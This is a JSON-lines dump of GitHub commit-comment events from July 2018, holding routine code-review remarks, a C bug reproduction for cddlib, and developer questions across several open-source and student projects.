{"id":"7993957969","type":"CommitCommentEvent","actor":{"login":"dentarg"},"repo":{"name":"barsoom/devbook"},"payload":{"comment":{"id":29776512,"position":5,"line":21,"path":"deploy_without_downtime/README.md","commit_id":"ebc273f125bcf1107302ab303f059e47191eea66","created_at":"2018-07-20T09:33:54Z","updated_at":"2018-07-20T09:33:54Z","author_association":"CONTRIBUTOR","body":"> I'm not sure if Heroku guarantees that the app servers have restarted with the new code before the migrations run.\r\n\r\nHow do you run your migrations? Do you use [Release Phase](https://devcenter.heroku.com/articles/release-phase)?\r\n\r\nIf you use [Preboot](https://devcenter.heroku.com/articles/preboot), new code and old code will run at the same time for a period of time."}},"created_at":"2018-07-20T09:33:54Z"}
{"id":"7993960112","type":"CommitCommentEvent","actor":{"login":"don228"},"repo":{"name":"CryptoAppsDev/BitcoinWallet"},"payload":{"comment":{"id":29776516,"position":null,"line":null,"path":null,"commit_id":"64af3a8bac5a4c33a9185b49f14cf8fee998e641","created_at":"2018-07-20T09:34:21Z","updated_at":"2018-07-20T09:34:21Z","author_association":"NONE","body":"Super!!!!"}},"created_at":"2018-07-20T09:34:21Z"}
{"id":"7993960228","type":"CommitCommentEvent","actor":{"login":"JoostvanPinxten"},"repo":{"name":"cddlib/cddlib"},"payload":{"comment":{"id":29776517,"position":null,"line":null,"path":null,"commit_id":"d7bbc21308e88a0445640af9c6d6b91c64497c34","created_at":"2018-07-20T09:34:23Z","updated_at":"2018-07-20T09:34:23Z","author_association":"NONE","body":"I've applied this patch, and this fixes one issue, but compiling and running a [test C program (originally posted here)](https://github.com/mcmtroffaes/pycddlib/issues/25#issuecomment-406313986) here (which I saved in test.c) still gives a segfault with libasan, and a warning from valgrind.\r\n\r\n```C\r\n// test.c\r\n#include <stdio.h>\r\n#include <setoper.h>\r\n#include <cdd.h>\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\r\n    dd_set_global_constants();\r\n\r\n    dd_MatrixPtr mat;\r\n\r\n    dd_ErrorType error = dd_NoError;\r\n\r\n    mat = dd_CreateMatrix(0,0);\r\n    mat->numbtype = dd_Integer;\r\n\r\n    dd_PolyhedraPtr poly = dd_DDMatrix2Poly(mat, &error);\r\n\r\n    if(error != dd_NoError)\r\n        printf(\"dd_error set\\n\");\r\n\r\n    if(mat == NULL)\r\n        printf(\"NULL matrix returned\\n\");\r\n\r\n    printf(\"freeing the polyhedron\\n\");\r\n    dd_FreePolyhedra(poly);\r\n    dd_free_global_constants();\r\n    return 0;\r\n}\r\n```\r\n\r\n```\r\n$ clang -o dd_test -DGMPRATIONAL -I/usr/local/include -L/usr/local/lib test.c -lcddgmp -lgmp -fsanitize=address\r\n$ ./dd_test\r\n``` \r\n\r\n```\r\n$ clang -o dd_test -DGMPRATIONAL -I/usr/local/include -L/usr/local/lib test.c -lcddgmp -lgmp\r\n$ valgrind ./dd_test\r\n``` \r\n\r\n```\r\n==38938== Conditional jump or move depends on uninitialised value(s)\r\n==38938==    at 0x4C2EDA1: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==38938==    by 0x4E46F60: dd_FreePolyhedra (cddcore.c:566)\r\n==38938==    by 0x4008A7: main (in /home/**/dd_test)\r\n```\r\n\r\n```\r\n$ clang --version\r\nclang version 3.8.0-2ubuntu4 (tags/RELEASE_380/final)\r\nTarget: x86_64-pc-linux-gnu\r\nThread model: posix\r\nInstalledDir: /usr/bin\r\n```\r\n\r\nAs run on Ubuntu 16.04.4 LTS."}},"created_at":"2018-07-20T09:34:23Z"}
{"id":"7993963230","type":"CommitCommentEvent","actor":{"login":"fredericDelaporte"},"repo":{"name":"nhibernate/NHibernate.AspNetCore.Identity"},"payload":{"comment":{"id":29776527,"position":4,"line":4,"path":".vscode/launch.json","commit_id":"9c6d2340969d048bffbd0ecf56ea3707abb141a1","created_at":"2018-07-20T09:35:01Z","updated_at":"2018-07-20T09:35:01Z","author_association":"MEMBER","body":"Keeping .vscode in the repository may cause unneeded noise on PR due to changes in this folder. Is there no other way to build with VSCode than to have tasks in that folder? Visual Studio or Rider are both able of building just from the csproj."}},"created_at":"2018-07-20T09:35:01Z"}
{"id":"7993963458","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776528,"position":55,"line":55,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:35:04Z","updated_at":"2018-07-20T09:35:04Z","author_association":"NONE","body":"Мы же делаем свою реализацию)  У тебя есть массив, пробегаешь в цикле по нему и возвращаешь номер"}},"created_at":"2018-07-20T09:35:04Z"}
{"id":"7993971044","type":"CommitCommentEvent","actor":{"login":"dusanvel"},"repo":{"name":"davidbujic/Python"},"payload":{"comment":{"id":29776542,"position":null,"line":null,"path":null,"commit_id":"d17c3dd09d28e04010661139659a81cc4cbd21f8","created_at":"2018-07-20T09:36:38Z","updated_at":"2018-07-20T09:36:38Z","author_association":"NONE","body":"Davide,\r\nNekoliko napomena koje je trebalo da dobijes i od Nikole @nikilic :\r\n\r\nVodi racuna o izboru imena i naslova. Repozitorij je ustvari ime tvog projekta i nikako ne moze da bude samo \"Python\" , moglo bi npr : mat_operacije_Python\r\n\r\nMinimalno u readme.md ide Opis tvog projekta, koji podrazumeva zapisan zadatak i sta je rezultat.\r\n\r\nOpisi sta su pre-requisite i koje se biblioteke koriste, u kom IDE radis (IDLE, PyCharm...)\r\n\r\nTakodje uvek napisi kako se izvrsava/pokrece kod (Installation and RUNing)"}},"created_at":"2018-07-20T09:36:38Z"}
{"id":"7993975096","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776557,"position":5,"line":16,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-20T09:37:28Z","updated_at":"2018-07-20T09:37:28Z","author_association":"CONTRIBUTOR","body":"When the page is displayed on a narrow screen, the table of contents now has the heading \"Contents\", rather than \"Table of Contents\". In addition, the section links are not displayed as links. Instead, they are black until you hover over them, at which point they change to blue.\r\n\r\nI prefer \"Table of Contents\" and blue text for the section links, but it's hardly a major issue."}},"created_at":"2018-07-20T09:37:28Z"}
{"id":"7993978883","type":"CommitCommentEvent","actor":{"login":"stsevdos"},"repo":{"name":"stsevdos/testWebsite"},"payload":{"comment":{"id":29776568,"position":1,"line":9,"path":"README.md","commit_id":"f433e62f4c83c3411a949bd95ab4e845c32c9931","created_at":"2018-07-20T09:38:15Z","updated_at":"2018-07-20T09:38:15Z","author_association":"OWNER","body":"## What is this for???\r\n\r\nPlease explain this line better."}},"created_at":"2018-07-20T09:38:15Z"}
{"id":"7993980312","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776571,"position":1240,"line":940,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-20T09:38:33Z","updated_at":"2018-07-20T09:38:33Z","author_association":"CONTRIBUTOR","body":"The chapter title was changed to _Legacy Publishing_, but the filename was retained."}},"created_at":"2018-07-20T09:38:33Z"}
{"id":"7993982331","type":"CommitCommentEvent","actor":{"login":"stsevdos"},"repo":{"name":"stsevdos/testWebsite"},"payload":{"comment":{"id":29776576,"position":null,"line":null,"path":null,"commit_id":"f433e62f4c83c3411a949bd95ab4e845c32c9931","created_at":"2018-07-20T09:38:58Z","updated_at":"2018-07-20T09:38:58Z","author_association":"OWNER","body":"## Commit Comment\r\n\r\nLooking at how this commit was created."}},"created_at":"2018-07-20T09:38:58Z"}
{"id":"7993984462","type":"CommitCommentEvent","actor":{"login":"SaylorZhu"},"repo":{"name":"davidtsadler/ebay-sdk-php"},"payload":{"comment":{"id":29776581,"position":null,"line":null,"path":null,"commit_id":"1e4bfac9dd5dda37a08e947f152b2b70e8a00cde","created_at":"2018-07-20T09:39:22Z","updated_at":"2018-07-20T09:39:22Z","author_association":"NONE","body":"CreateReportTasktRestResponse -> CreateReportTaskRestResponse"}},"created_at":"2018-07-20T09:39:22Z"}
{"id":"7993984477","type":"CommitCommentEvent","actor":{"login":"dishu2016"},"repo":{"name":"dishu2016/demo"},"payload":{"comment":{"id":29776582,"position":null,"line":null,"path":null,"commit_id":"d4fbb9b044f3ab7083eeb5938d250a8918885b31","created_at":"2018-07-20T09:39:22Z","updated_at":"2018-07-20T09:39:22Z","author_association":"OWNER","body":"采用ArrayBlockingQueue，且核心线程为一个的方式进行验证。阿里规约建议线程池用ThreadPoolExecutor，而不是使用Executors直接创建"}},"created_at":"2018-07-20T09:39:22Z"}
{"id":"7993988781","type":"CommitCommentEvent","actor":{"login":"faho"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":29776594,"position":null,"line":null,"path":null,"commit_id":"c7a682ed050e204b4640da19434da7c53501d1f4","created_at":"2018-07-20T09:40:10Z","updated_at":"2018-07-20T09:40:10Z","author_association":"MEMBER","body":"@C-Bouthoorn:\r\n\r\nThis was not included in 2.7.0, because at that point, this was on the \"major\" branch, which then later became master.\r\n\r\nYou can't trust git's branch names - check something like `git tag --contains` instead, which github also displays under the commit message, right _next_ to the branch. If it says 2.7.0 there, then it's included in the tag."}},"created_at":"2018-07-20T09:40:10Z"}
{"id":"7993991200","type":"CommitCommentEvent","actor":{"login":"elinqqpeter"},"repo":{"name":"elinqqpeter/lab"},"payload":{"comment":{"id":29776598,"position":null,"line":null,"path":null,"commit_id":"3403935472aa589198d79e828cef74ddbe7b8d33","created_at":"2018-07-20T09:40:37Z","updated_at":"2018-07-20T09:40:37Z","author_association":"OWNER","body":"this is another test for this platform"}},"created_at":"2018-07-20T09:40:37Z"}
{"id":"7993994919","type":"CommitCommentEvent","actor":{"login":"elinqqpeter"},"repo":{"name":"elinqqpeter/lab"},"payload":{"comment":{"id":29776601,"position":null,"line":null,"path":null,"commit_id":"3403935472aa589198d79e828cef74ddbe7b8d33","created_at":"2018-07-20T09:41:22Z","updated_at":"2018-07-20T09:41:22Z","author_association":"OWNER","body":"..we ll c"}},"created_at":"2018-07-20T09:41:22Z"}
{"id":"7993996092","type":"CommitCommentEvent","actor":{"login":"lvtaode"},"repo":{"name":"lvtaode/vue-backend"},"payload":{"comment":{"id":29776604,"position":null,"line":null,"path":null,"commit_id":"013c59672d3247adb0c0adccb75d938fdad4b602","created_at":"2018-07-20T09:41:36Z","updated_at":"2018-07-20T09:41:36Z","author_association":"OWNER","body":"这是干什么的"}},"created_at":"2018-07-20T09:41:36Z"}
{"id":"7993996198","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776605,"position":239,"line":181,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-20T09:41:38Z","updated_at":"2018-07-20T09:41:38Z","author_association":"CONTRIBUTOR","body":"You don't need the `#` prefix in the link as far as I can tell."}},"created_at":"2018-07-20T09:41:38Z"}
{"id":"7994003354","type":"CommitCommentEvent","actor":{"login":"DmitriyKartashov"},"repo":{"name":"icebrkr/odometry"},"payload":{"comment":{"id":29776619,"position":null,"line":null,"path":null,"commit_id":"ad00110b47bd7c4f42ef4e8c1b55a5da20857ca3","created_at":"2018-07-20T09:42:59Z","updated_at":"2018-07-20T09:42:59Z","author_association":"NONE","body":"> Задача вычислить одометрию робота. Т.е. по показаниям датчиков колес расчитать положение робота. Предлагается сделать это для конкретного типового робота. Но задача сильно легкая и я решил, что они не только хотят это увидеть.\r\n\r\nThat's not always good.\r\nWhen you are deciding to do extra work, you can face several risks:\r\n- you a writing extra code, and can make extra mistakes\r\n- reviewer will have to review more (they are often very lazy, believe me), and that makes him angry at the beginning\r\n- you will start with a profile of a _challenge guy_: \"Look, your tasks are too easy for me, I'm cool and then will do it more complicated\"\r\n- you will not show that you can perform simple tasks.\r\n\r\n>Соотвественно за вычисление одометрии робота у меня отвечает класс OdometryProcessor. Для того чтобы можно было вычислить одометрию конкретного робота класс должен знать его киниматическу модель. И для того, чтобы не зависить от конкретного робота он должен агрегировать в себе объект представляющий общий интерфейс для мат моделей роботов. \r\n\r\nThat sounds very right.\r\n\r\n>Соотвественно сделал базовый интерфейсный класс для мат модели VehicleModel. От него отнаследовался для конкретных роботов. \r\nЗдесь есть один затык касающихся данных, которые передаються в аргументы мутодов VehicleModel. У одного робота робота есть релевое колесо у другого нет. Поэтому есть несколько вариантов. \r\n>1) создаем общий класс который описывает состояние для все роботов, а затем уже конкретный класс разбирается что ему нужно. В этом случае получаес оверхед по данным.\r\n>2) Создаем базовый класс данных состояния робота. Наследники описывают состояние конкретного робота. В результате получаем решение, в котором есть проверки типа времени выполнения для того, чтобы преобразовать от базового к потомкам.\r\n>3) передавать список из double. с математической точки зрения это правильно и удобно. А конкретный класс уже внутри сам разбирается элемент с каким индексом к чему относиться.\r\n\r\n>Выбрал 3 вариант.\r\nBad choice.\r\n\r\n>Далее для удобного конфигурирования создал базовый класс для создания модели робота VehicleModel Maker. И соотвественно реализовал паттерн фабричный метод.\r\nВроде все\r\nОпять повторюс задача не большая и нет большой иерхахии или каких-то сложных связей между классами\r\nМожно конечно еще написать версию без RTTI. Но надо ли?\r\n\r\nWhat is RTTI?"}},"created_at":"2018-07-20T09:42:59Z"}
{"id":"7994003358","type":"CommitCommentEvent","actor":{"login":"C-Bouthoorn"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":29776620,"position":null,"line":null,"path":null,"commit_id":"c7a682ed050e204b4640da19434da7c53501d1f4","created_at":"2018-07-20T09:42:59Z","updated_at":"2018-07-20T09:42:59Z","author_association":"NONE","body":"I see. In that case, could a new version be rolled from the current `master` branch? I prefer to have my package manager handling versions instead of manually pulling and recompiling projects every so often."}},"created_at":"2018-07-20T09:42:59Z"}
{"id":"7994005773","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29776626,"position":15,"line":15,"path":"src/utils/spreadCalculator.test.tsx","commit_id":"644f9711b4bb8ca90e439b4627a284297fb9c90d","created_at":"2018-07-20T09:43:28Z","updated_at":"2018-07-20T09:43:28Z","author_association":"COLLABORATOR","body":"Add tests for `0` values"}},"created_at":"2018-07-20T09:43:28Z"}
{"id":"7994006097","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29776628,"position":15,"line":528,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/AsmUtil.java","commit_id":"5c9a71b883879e71772aaba7dc28f6462ef80d65","created_at":"2018-07-20T09:43:32Z","updated_at":"2018-07-20T09:43:32Z","author_association":"MEMBER","body":"`@NotNull  Type type` redundant whitespace"}},"created_at":"2018-07-20T09:43:32Z"}
{"id":"7994007123","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776632,"position":21,"line":21,"path":"BlackJack/hand.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T09:43:43Z","updated_at":"2018-07-20T09:43:43Z","author_association":"NONE","body":"сложновато, но ок, раз уж работает ))"}},"created_at":"2018-07-20T09:43:43Z"}
{"id":"7994007288","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29776633,"position":15,"line":528,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/AsmUtil.java","commit_id":"5c9a71b883879e71772aaba7dc28f6462ef80d65","created_at":"2018-07-20T09:43:45Z","updated_at":"2018-07-20T09:43:45Z","author_association":"MEMBER","body":"`@NotNull  InstructionAdapter v` too"}},"created_at":"2018-07-20T09:43:45Z"}
{"id":"7994008980","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29776638,"position":5,"line":5,"path":"src/utils/spreadCalculator.ts","commit_id":"644f9711b4bb8ca90e439b4627a284297fb9c90d","created_at":"2018-07-20T09:44:05Z","updated_at":"2018-07-20T09:44:05Z","author_association":"COLLABORATOR","body":"join these calculations into one line"}},"created_at":"2018-07-20T09:44:05Z"}
{"id":"7994012348","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29776647,"position":16,"line":15,"path":"src/TableRow.tsx","commit_id":"644f9711b4bb8ca90e439b4627a284297fb9c90d","created_at":"2018-07-20T09:44:46Z","updated_at":"2018-07-20T09:44:46Z","author_association":"COLLABORATOR","body":"add new line"}},"created_at":"2018-07-20T09:44:46Z"}
{"id":"7994013257","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776650,"position":221,"line":169,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-20T09:44:58Z","updated_at":"2018-07-20T09:44:58Z","author_association":"CONTRIBUTOR","body":"I think the API links could do with a little bit of spacing left and right. They're a bit cramped right now visually."}},"created_at":"2018-07-20T09:44:58Z"}
{"id":"7994015425","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776657,"position":17,"line":17,"path":"BlackJack/hand.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T09:45:26Z","updated_at":"2018-07-20T09:45:26Z","author_association":"NONE","body":"вот это скорее просто \"иф-элс\" , чем рейз с рескью... оставь, если хочешь, но не очень вариант"}},"created_at":"2018-07-20T09:45:26Z"}
{"id":"7994018581","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29776659,"position":12,"line":28,"path":"src/Dashboard.tsx","commit_id":"644f9711b4bb8ca90e439b4627a284297fb9c90d","created_at":"2018-07-20T09:46:04Z","updated_at":"2018-07-20T09:46:04Z","author_association":"COLLABORATOR","body":"Change to\r\n```\r\nconst {\r\n  config\r\n} = this.state\r\n```"}},"created_at":"2018-07-20T09:46:04Z"}
{"id":"7994019897","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776662,"position":239,"line":181,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-20T09:46:18Z","updated_at":"2018-07-20T09:46:18Z","author_association":"CONTRIBUTOR","body":"Also, no reason to capitalise \"copy\" here."}},"created_at":"2018-07-20T09:46:18Z"}
{"id":"7994022019","type":"CommitCommentEvent","actor":{"login":"xhdix"},"repo":{"name":"TelegramMessenger/MTProxy"},"payload":{"comment":{"id":29776669,"position":null,"line":null,"path":null,"commit_id":"f9158e3129efd4ccdc291aefb840209791226a77","created_at":"2018-07-20T09:46:42Z","updated_at":"2018-07-20T09:46:42Z","author_association":"NONE","body":"If the client does not support random padding mode, it can still be identified and blocked?"}},"created_at":"2018-07-20T09:46:42Z"}
{"id":"7994028007","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29776684,"position":null,"line":null,"path":null,"commit_id":"5c9a71b883879e71772aaba7dc28f6462ef80d65","created_at":"2018-07-20T09:47:55Z","updated_at":"2018-07-20T09:47:55Z","author_association":"MEMBER","body":"Beside KT-25613, I'd create an issue that would be fixed with this commit"}},"created_at":"2018-07-20T09:47:55Z"}
{"id":"7994030592","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29776686,"position":18,"line":33,"path":"src/Dashboard.tsx","commit_id":"644f9711b4bb8ca90e439b4627a284297fb9c90d","created_at":"2018-07-20T09:48:24Z","updated_at":"2018-07-20T09:48:24Z","author_association":"COLLABORATOR","body":"```\r\nreturn config.map(({ pair, exchanges }: { pair: string, exchanges: array }) => (\r\n  <PairTable pair={pair} exchanges={exchanges} key={pair} />\r\n))\r\n```\r\n\r\nNot sure if `exchanges` is an array"}},"created_at":"2018-07-20T09:48:24Z"}
{"id":"7994032766","type":"CommitCommentEvent","actor":{"login":"christiansandberg"},"repo":{"name":"hardbyte/python-can"},"payload":{"comment":{"id":29776689,"position":5,"line":28,"path":"doc/interfaces.rst","commit_id":"6735a0ea753b70c19cf098fbb131daffcb1258df","created_at":"2018-07-20T09:48:47Z","updated_at":"2018-07-20T09:48:47Z","author_association":"COLLABORATOR","body":"@felixdivo, what was the reason to change this? It broke backwards compatibility with all 3rd party interfaces."}},"created_at":"2018-07-20T09:48:47Z"}
{"id":"7994033142","type":"CommitCommentEvent","actor":{"login":"mdoering"},"repo":{"name":"Sp2000/colplus-backend"},"payload":{"comment":{"id":29776690,"position":3,"line":3,"path":"colplus-admin/src/test/java/org/col/admin/importer/reference/ReferenceFactoryTest.java","commit_id":"7cd1248d69fb0d2dd3cee9f0b7ed03604c7143ba","created_at":"2018-07-20T09:48:51Z","updated_at":"2018-07-20T09:48:51Z","author_association":"COLLABORATOR","body":"Better not have no empty test classes"}},"created_at":"2018-07-20T09:48:51Z"}
{"id":"7994038035","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29776699,"position":39,"line":588,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ImplementationBodyCodegen.java","commit_id":"5c9a71b883879e71772aaba7dc28f6462ef80d65","created_at":"2018-07-20T09:49:41Z","updated_at":"2018-07-20T09:49:41Z","author_association":"MEMBER","body":"Looks like this commit fixes hashCode/equals for data classes as well?\r\nI think it'd nice to have tests with data classes, too"}},"created_at":"2018-07-20T09:49:41Z"}
{"id":"7994038830","type":"CommitCommentEvent","actor":{"login":"GiangH14"},"repo":{"name":"GiangH14/Demo3D"},"payload":{"comment":{"id":29776701,"position":134,"line":134,"path":"Index.html","commit_id":"91d2f1ddb3aa867fde375022111af2c6dba0654e","created_at":"2018-07-20T09:49:51Z","updated_at":"2018-07-20T09:49:51Z","author_association":"OWNER","body":"comment\r\n"}},"created_at":"2018-07-20T09:49:51Z"}
{"id":"7994041227","type":"CommitCommentEvent","actor":{"login":"mdoering"},"repo":{"name":"Sp2000/colplus-backend"},"payload":{"comment":{"id":29776708,"position":11,"line":46,"path":"colplus-dao/src/main/java/org/col/db/dao/TaxonDao.java","commit_id":"7cd1248d69fb0d2dd3cee9f0b7ed03604c7143ba","created_at":"2018-07-20T09:50:19Z","updated_at":"2018-07-20T09:50:19Z","author_association":"COLLABORATOR","body":"This throws a NPE now instead of the NotFoundException 👎 "}},"created_at":"2018-07-20T09:50:19Z"}
{"id":"7994042880","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29776712,"position":5,"line":1459,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/StackValue.java","commit_id":"5c9a71b883879e71772aaba7dc28f6462ef80d65","created_at":"2018-07-20T09:50:40Z","updated_at":"2018-07-20T09:50:40Z","author_association":"MEMBER","body":"Again, seems like it's not relevant to strings"}},"created_at":"2018-07-20T09:50:40Z"}
{"id":"7994045566","type":"CommitCommentEvent","actor":{"login":"Xudong-Huang"},"repo":{"name":"trustnote/rust-trustnote"},"payload":{"comment":{"id":29776723,"position":null,"line":null,"path":null,"commit_id":"cccf1adf7454e9839a416d2e0337868f8d87a7b0","created_at":"2018-07-20T09:51:12Z","updated_at":"2018-07-20T09:51:12Z","author_association":"CONTRIBUTOR","body":"ref #248 "}},"created_at":"2018-07-20T09:51:12Z"}
{"id":"7994046560","type":"CommitCommentEvent","actor":{"login":"bilaltariq2122"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29776726,"position":null,"line":null,"path":null,"commit_id":"2d9977cd4ad365ba7b7c946bce86ab924abf94e7","created_at":"2018-07-20T09:51:23Z","updated_at":"2018-07-20T09:51:23Z","author_association":"NONE","body":"you are right but how can i create .mat file for this project\nBilal Tariq!!!!\n\n\nOn Fri, Jul 20, 2018 at 10:23 AM Part Gadoya <notifications@github.com>\nwrote:\n\n> Hi,\n>\n> I have worked on this project around 2 months back and on college local PC.\n> And I am currently out of station and don't have access to that PC. I may\n> not be able to give those files currently.\n>\n> But main code is \"bif.m\", other files are not much tough to code, you can\n> easily get help from matlab standard functions (kpls) and create basic loop\n> for training and testing purposes. And you are done.\n>\n> Thanks with regards,\n> Parth Gadoya\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation/commit/2d9977cd4ad365ba7b7c946bce86ab924abf94e7#commitcomment-29774152>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AidTJ_XccBzUTGX2EgLjxursaddlJgo8ks5uIWlYgaJpZM4VXAP_>\n> .\n>\n"}},"created_at":"2018-07-20T09:51:23Z"}
{"id":"7994051875","type":"CommitCommentEvent","actor":{"login":"bilaltariq2122"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29776737,"position":null,"line":null,"path":null,"commit_id":"2d9977cd4ad365ba7b7c946bce86ab924abf94e7","created_at":"2018-07-20T09:52:29Z","updated_at":"2018-07-20T09:52:29Z","author_association":"NONE","body":"you plz guide me or help me to to create .mat file for this project and\nhelp me so that i can run this project.\nand find human age and gender estimation.\na lot of bundles for u.\nBilal Tariq!!!!\n\n\nOn Fri, Jul 20, 2018 at 2:51 PM Bilal Tariq <bilaltariq2122@gmail.com>\nwrote:\n\n> you are right but how can i create .mat file for this project\n> Bilal Tariq!!!!\n>\n>\n> On Fri, Jul 20, 2018 at 10:23 AM Part Gadoya <notifications@github.com>\n> wrote:\n>\n>> Hi,\n>>\n>> I have worked on this project around 2 months back and on college local\n>> PC.\n>> And I am currently out of station and don't have access to that PC. I may\n>> not be able to give those files currently.\n>>\n>> But main code is \"bif.m\", other files are not much tough to code, you can\n>> easily get help from matlab standard functions (kpls) and create basic\n>> loop\n>> for training and testing purposes. And you are done.\n>>\n>> Thanks with regards,\n>> Parth Gadoya\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation/commit/2d9977cd4ad365ba7b7c946bce86ab924abf94e7#commitcomment-29774152>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AidTJ_XccBzUTGX2EgLjxursaddlJgo8ks5uIWlYgaJpZM4VXAP_>\n>> .\n>>\n>\n"}},"created_at":"2018-07-20T09:52:29Z"}
{"id":"7994052281","type":"CommitCommentEvent","actor":{"login":"mdoering"},"repo":{"name":"Sp2000/colplus-backend"},"payload":{"comment":{"id":29776738,"position":25,"line":39,"path":"colplus-ws/src/main/java/org/col/resources/TaxonResource.java","commit_id":"7cd1248d69fb0d2dd3cee9f0b7ed03604c7143ba","created_at":"2018-07-20T09:52:33Z","updated_at":"2018-07-20T09:52:33Z","author_association":"COLLABORATOR","body":"why do we still throw 404 exceptions manually?"}},"created_at":"2018-07-20T09:52:33Z"}
{"id":"7994056056","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776749,"position":511,"line":375,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-20T09:53:20Z","updated_at":"2018-07-20T09:53:20Z","author_association":"CONTRIBUTOR","body":"Broken link"}},"created_at":"2018-07-20T09:53:20Z"}
{"id":"7994057523","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/devbook"},"payload":{"comment":{"id":29776756,"position":5,"line":21,"path":"deploy_without_downtime/README.md","commit_id":"ebc273f125bcf1107302ab303f059e47191eea66","created_at":"2018-07-20T09:53:38Z","updated_at":"2018-07-20T09:53:38Z","author_association":"MEMBER","body":"I don't think I was aware of Release Phase. Interesting. I guess that means we could get our old \"run migrations before updating app code\" behaviour if we want it. @joakimk, I suspect you've looked into this?\r\n\r\nWe do use Preboot, and I know we'll run old and new app code side by side, but I was wondering more if we wait for all servers to use new app before running migrations. Looking at our deploy scripts, it looks like we don't. Hrm. One more reason to consider Release Phase for running migrations early, to make it easier to reason about.\r\n\r\nWill discuss this with @joakimk after the summer and maybe update docs and/or the release process :)"}},"created_at":"2018-07-20T09:53:38Z"}
{"id":"7994060432","type":"CommitCommentEvent","actor":{"login":"jinniudashu"},"repo":{"name":"jinniudashu/test"},"payload":{"comment":{"id":29776766,"position":null,"line":null,"path":null,"commit_id":"e17efbddde2b53d02bab49de1a9b5e94a85f4232","created_at":"2018-07-20T09:54:13Z","updated_at":"2018-07-20T09:54:13Z","author_association":"OWNER","body":"for #1 "}},"created_at":"2018-07-20T09:54:13Z"}
